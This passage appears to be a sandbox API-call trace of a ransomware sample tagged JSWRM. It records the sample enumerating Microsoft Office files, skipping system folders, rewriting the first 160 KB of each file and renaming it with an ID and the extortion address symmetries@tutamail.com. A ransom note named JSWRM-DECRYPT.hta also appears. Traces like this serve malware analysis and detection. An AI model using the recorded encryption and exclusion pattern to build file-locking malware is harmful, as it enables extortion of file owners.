lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0102.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0102.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0102.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0102.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0102.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.212] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.wordmui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.wordmui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.wordmui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0102.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0102.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0102.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.213] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2c30669, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2c30669, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2dfa2a2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12c470, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Integrator.exe", cAlternateFileName="INTEGR~1.EXE")) returned 1 [0102.213] lstrcmpiW (lpString1="Integrator.exe", lpString2=".") returned 1 [0102.213] lstrcmpiW (lpString1="Integrator.exe", lpString2="..") returned 1 [0102.213] lstrcmpiW (lpString1="Integrator.exe", lpString2="...") returned 1 [0102.213] lstrcmpiW (lpString1="Integrator.exe", lpString2="windows") returned -1 [0102.213] lstrcmpiW (lpString1="Integrator.exe", lpString2="recovery") returned -1 [0102.213] lstrcmpiW (lpString1="Integrator.exe", lpString2="perflogs") returned -1 [0102.213] lstrcmpiW (lpString1="Integrator.exe", lpString2="documents and settings") returned 1 [0102.213] lstrcmpiW (lpString1="Integrator.exe", lpString2="$RECYCLE.BIN") returned 1 [0102.213] lstrcmpiW (lpString1="Integrator.exe", lpString2="system volume information") returned -1 [0102.213] lstrcmpiW (lpString1="Integrator.exe", lpString2="msocache") returned -1 [0102.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0102.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Integrator.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Integrator.exe", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Integrator.exe", lpUsedDefaultChar=0x0) returned 14 [0102.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0102.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0102.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Integrator.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Integrator.exe", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Integrator.exe", lpUsedDefaultChar=0x0) returned 14 [0102.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0102.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0102.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0102.213] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33234999, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x33234999, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3325aa46, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0102.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0102.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0102.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0102.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0102.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0102.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0102.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0102.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0102.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0102.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0102.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0102.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0102.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0102.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0102.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0102.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0102.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0102.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0102.214] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1158e0a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x128ed2a1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6e22a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneDriveSetup.exe", cAlternateFileName="ONEDRI~1.EXE")) returned 1 [0102.214] lstrcmpiW (lpString1="OneDriveSetup.exe", lpString2=".") returned 1 [0102.214] lstrcmpiW (lpString1="OneDriveSetup.exe", lpString2="..") returned 1 [0102.214] lstrcmpiW (lpString1="OneDriveSetup.exe", lpString2="...") returned 1 [0102.214] lstrcmpiW (lpString1="OneDriveSetup.exe", lpString2="windows") returned -1 [0102.214] lstrcmpiW (lpString1="OneDriveSetup.exe", lpString2="recovery") returned -1 [0102.214] lstrcmpiW (lpString1="OneDriveSetup.exe", lpString2="perflogs") returned -1 [0102.214] lstrcmpiW (lpString1="OneDriveSetup.exe", lpString2="documents and settings") returned 1 [0102.214] lstrcmpiW (lpString1="OneDriveSetup.exe", lpString2="$RECYCLE.BIN") returned 1 [0102.214] lstrcmpiW (lpString1="OneDriveSetup.exe", lpString2="system volume information") returned -1 [0102.215] lstrcmpiW (lpString1="OneDriveSetup.exe", lpString2="msocache") returned 1 [0102.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneDriveSetup.exe", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0102.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneDriveSetup.exe", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneDriveSetup.exe", lpUsedDefaultChar=0x0) returned 17 [0102.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneDriveSetup.exe", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0102.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneDriveSetup.exe", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneDriveSetup.exe", lpUsedDefaultChar=0x0) returned 17 [0102.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0102.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0102.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0102.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0102.215] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xef3b8917, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xef3b8917, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xef4774a9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x18ad800, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="QFE31927.msp", cAlternateFileName="")) returned 1 [0102.215] lstrcmpiW (lpString1="QFE31927.msp", lpString2=".") returned 1 [0102.215] lstrcmpiW (lpString1="QFE31927.msp", lpString2="..") returned 1 [0102.215] lstrcmpiW (lpString1="QFE31927.msp", lpString2="...") returned 1 [0102.215] lstrcmpiW (lpString1="QFE31927.msp", lpString2="windows") returned -1 [0102.215] lstrcmpiW (lpString1="QFE31927.msp", lpString2="recovery") returned -1 [0102.215] lstrcmpiW (lpString1="QFE31927.msp", lpString2="perflogs") returned 1 [0102.215] lstrcmpiW (lpString1="QFE31927.msp", lpString2="documents and settings") returned 1 [0102.215] lstrcmpiW (lpString1="QFE31927.msp", lpString2="$RECYCLE.BIN") returned 1 [0102.215] lstrcmpiW (lpString1="QFE31927.msp", lpString2="system volume information") returned -1 [0102.215] lstrcmpiW (lpString1="QFE31927.msp", lpString2="msocache") returned 1 [0102.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0102.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QFE31927.msp", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QFE31927.msp", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QFE31927.msp", lpUsedDefaultChar=0x0) returned 12 [0102.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0102.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0102.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QFE31927.msp", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QFE31927.msp", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QFE31927.msp", lpUsedDefaultChar=0x0) returned 12 [0102.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0102.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0102.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0102.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0102.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\QFE31927.msp" (normalized: "c:\\program files\\microsoft office\\root\\integration\\qfe31927.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.225] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=25876480) returned 1 [0102.225] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0102.225] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0102.241] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.241] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0102.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.242] CloseHandle (hObject=0x45c) returned 1 [0102.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0102.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0102.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0102.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0102.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0102.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0102.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0102.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0102.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.242] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\QFE31927.msp" (normalized: "c:\\program files\\microsoft office\\root\\integration\\qfe31927.msp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\QFE31927.msp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\qfe31927.msp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0102.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0102.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0102.244] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xee75a612, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee75a612, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xef109ec5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x18ad800, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="QFE31928.msp", cAlternateFileName="")) returned 1 [0102.244] lstrcmpiW (lpString1="QFE31928.msp", lpString2=".") returned 1 [0102.244] lstrcmpiW (lpString1="QFE31928.msp", lpString2="..") returned 1 [0102.244] lstrcmpiW (lpString1="QFE31928.msp", lpString2="...") returned 1 [0102.244] lstrcmpiW (lpString1="QFE31928.msp", lpString2="windows") returned -1 [0102.244] lstrcmpiW (lpString1="QFE31928.msp", lpString2="recovery") returned -1 [0102.244] lstrcmpiW (lpString1="QFE31928.msp", lpString2="perflogs") returned 1 [0102.244] lstrcmpiW (lpString1="QFE31928.msp", lpString2="documents and settings") returned 1 [0102.244] lstrcmpiW (lpString1="QFE31928.msp", lpString2="$RECYCLE.BIN") returned 1 [0102.244] lstrcmpiW (lpString1="QFE31928.msp", lpString2="system volume information") returned -1 [0102.244] lstrcmpiW (lpString1="QFE31928.msp", lpString2="msocache") returned 1 [0102.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0102.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QFE31928.msp", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QFE31928.msp", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QFE31928.msp", lpUsedDefaultChar=0x0) returned 12 [0102.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0102.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0102.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QFE31928.msp", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QFE31928.msp", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QFE31928.msp", lpUsedDefaultChar=0x0) returned 12 [0102.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0102.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0102.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0102.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0102.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\QFE31928.msp" (normalized: "c:\\program files\\microsoft office\\root\\integration\\qfe31928.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.245] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=25876480) returned 1 [0102.246] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0102.246] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0102.259] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 